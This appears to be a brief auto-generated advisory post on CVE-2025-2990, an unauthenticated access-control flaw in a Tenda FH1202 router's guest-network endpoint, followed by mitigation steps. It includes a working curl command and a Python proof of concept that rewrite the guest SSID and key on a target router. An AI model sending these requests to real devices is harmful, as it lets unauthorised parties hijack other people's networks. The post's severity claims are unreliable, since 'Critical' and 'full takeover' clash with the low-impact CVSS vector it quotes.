Listen to this Post
How CVE-2025-2990 Works
The vulnerability exists in Tenda FH1202 firmware version 1.2.0.14(408) within the `/goform/AdvSetWrlGstset` endpoint of the web management interface. Attackers can remotely exploit improper access controls to manipulate router settings without authentication. The flaw allows unauthorized access to administrative functions, potentially enabling network hijacking, MITM attacks, or device compromise. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) reflects its network-based attack vector and low attack complexity. Public exploit availability increases its critical severity.
DailyCVE Form
Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper access control
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation
1. Curl Exploit:
curl -X POST http://<TARGET_IP>/goform/AdvSetWrlGstset -d "ssid=HACKED&key=12345678"
2. Python PoC:
import requests
target = "http://192.168.1.1/goform/AdvSetWrlGstset"
payload = {"enable": "1", "ssid": "EVIL_NET", "key": "P@ssw0rd"}
requests.post(target, data=payload)
Mitigation
1. Patch: Upgrade to firmware >1.2.0.14(408).
2. Firewall Rule:
iptables -A INPUT -p tcp --dport 80 -s ! <TRUSTED_IP> -j DROP
3. Log Monitoring:
grep "POST /goform/AdvSetWrlGstset" /var/log/nginx/access.log
Analytics
- Attack Surface: Remote, unauthenticated HTTP requests.
- Impact: Full router configuration takeover.
- Detection: Unauthorized SSID/password changes.
References
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2990
Extra Source Hub:
Undercode
